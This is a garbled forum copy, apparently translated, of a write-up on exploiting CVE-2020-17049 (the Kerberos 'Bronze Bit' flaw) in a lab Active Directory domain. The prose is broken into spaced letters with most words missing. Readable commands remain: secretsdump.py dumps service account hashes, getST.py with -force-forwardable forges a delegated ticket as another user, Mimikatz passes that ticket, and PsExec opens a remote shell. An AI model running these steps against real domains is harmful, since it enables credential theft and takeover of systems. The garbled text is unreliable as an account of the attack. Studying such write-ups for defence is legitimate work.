[20398] 2020-12-11_CVE-2020-17049:Kerberos实际利用

文档创建者:s7ckTeam
浏览次数:0
最后更新:2025-01-18
2020-12-11_CVE-2020-17049:Kerberos实际利用 C V E - 2 0 2 0 - 1 7 0 4 9 K e r b e r o s J a k e   K a r n e s   K h a n   2 0 2 0 - 1 2 - 1 1 K e r b e r o s 1 .   A D 2 .     S e r v i c e 1 D C   S y n c K e r b e r o a s t i n g P o w e r m a d 使 S P N 3 .   S e r v i c e 1   S e r v i c e 2 a .   A D S e r v i c e 2 G e n e r i c A l l G e n e r i c W r i t e W r i t e O w n e r S e r v i c e 1 S e r v i c e 2   P r i n c i p a l s A l l o w e d T o D e l e g a t e T o A c c o u n t E l a d S h a m i r W i l l   S c h r o e d e r b .   S e r v i c e 1 S e r v i c e 2 S e r v i c e 2 S e r v i c e 1   A l l o w e d T o D e l e g a t e T o c .   S e r v i c e 2 S e r v i c e 1 S e r v i c e 1 S e r v i c e 2 P r i n c i p a l s A l l o w e d T o D e l e g a t e T o A c c o u n t 4 .   S e r v i c e 1 K e r b e r o s S e r v i c e 2 5 .   S e r v i c e 2 S e r v i c e 2 S e r v i c e 2 I m p a c k e t S e c u r e A u t h I m p a c k e t g e t S T . p y 4 S e r v i c e 1 S e r v i c e 1 S e r v i c e 2 S e r v i c e 2 访 使 g e t S T . p y S 4 U S e r v i c e 1 使   T r u s t e d T o A u t h F o r D e l e g a t i o n
S e r v i c e 2 S e r v i c e 1 S 4 U 2 s e l f S 4 U 2 p r o x y B r o n z e   B i t g e t S T . p y - f o r c e - f o r w a r d a b l e - f o r c e - f o r w a r d a b l e S 4 U 2 s e l f K D C S 4 U 2 s e l f 使 S e r v i c e 1 S 4 U 2 p r o x y K D C S e r v i c e 2
S e r v i c e 2 5 1 使 K e r b e r o s t e s t . l o c a l 3 W i n d o w s   S e r v e r   2 0 1 9 S e r v i c e 1 U s e r 1 S e r v i c e 2 访 U s e r 2 D C K e r b e r o s D C S e r v i c e 1 使 S e r v i c e 2 3 A c t i v e   D i r e c t o r y   G U I
D C U s e r 2 使 使 U s e r 2
U s e r 2 退 U s e r 1 S e r v i c e 1 1   P o w e r S h e l l U s e r 1 S e r v i c e 1 访 S e r v i c e 2 l s     s e r v i c e 2 . t e s t . l o c a l     c   $   P S T o o l s     P s E x e c 6 4 . e x e     s e r v i c e 2 . t e s t . l o c a l     p o w e r s h e l l . e x e
U s e r 1 访 S e r v i c e 2 S e r v i c e 1 使 I m p a c k e t s e c r e t s d u m p . p y S e r v i c e 1 A E S 2 5 6 - C T S - H M A C - S H A 1 - 9 6 L M N T L M p y t h o n   i m p a c k e t     e x a m p l e s     s e c r e t s d u m p . p y ' t e s t   /   u s e r 1 < u s e r 1 _ p a s s w o r d >   @   S e r v i c e 1 . t e s t . l o c a l '
- f o r c e - f o r w a r d a b l e g e t S T . p y S 4 U 2 s e l f 2 S e r v i c e 1 F o r w a r d a b l e S 4 U 2 p r o x y   i m p a c k e t     e x a m p l e s     g e t S T . p y   - s p n   c i f s   /   S e r v i c e 2 . t e s t . l o c a l - U s e r 2 - < L M N T L M >   - a e s K e y < A E S >   t e s t . l o c a l   /   S e r v i c e 1 4 - f o r c e - f o r w a r d a b l e   i m p a c k e t     e x a m p l e s     g e t S T . p y   - s p n   c i f s   /   S e r v i c e 2 . t e s t . l o c a l - U s e r 2 - < L M N T L M   h a s h >   - a e s K e y < A E S   h a s h >   t e s t . l o c a l   /   S e r v i c e 1   - f o r c e - f o r w a r d a b l e
西 S 4 U 2 0 0 0 0 0 0 0 0 1 0 1 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 S 4 U 2 s e l f 0 1 0 0 0 0 0 0 1 0 1 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 S 4 U 2 s e l f - f o r c e - f o r w a r d a b l e S 4 U 2 s e l f 使 S e r v i c e 1 0 1 S 4 U 2 p r o x y U s e r 2 S e r v i c e 2 U s e r 2 . c c a c h e 使 M i m i k a t z 使 M i m i k a t z U s e r 2 S e r v i c e 2 c i f s   m i m i k a t z     m i m i k a t z . e x e     k e r b e r o s   : :   p t c   U s e r 2 . c c a c h e 退
访 U s e r 2 访 S e r v i c e 2 U s e r 2 S e r v i c e 2 使 M a r k   R u s s i n o v i c h P S E x e c S e r v i c e 2 P o w e r S h e l l l s     s e r v i c e 2 . t e s t . l o c a l     c   $   P S T o o l s     P s E x e c 6 4 . e x e     s e r v i c e 2 . t e s t . l o c a l     p o w e r s h e l l . e x e
K e r b e r o s 仿 2 S e r v i c e 2 A D S e r v i c e 2 使 U s e r 2 使 S e r v i c e 1 D C 使 S e r v i c e 1
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则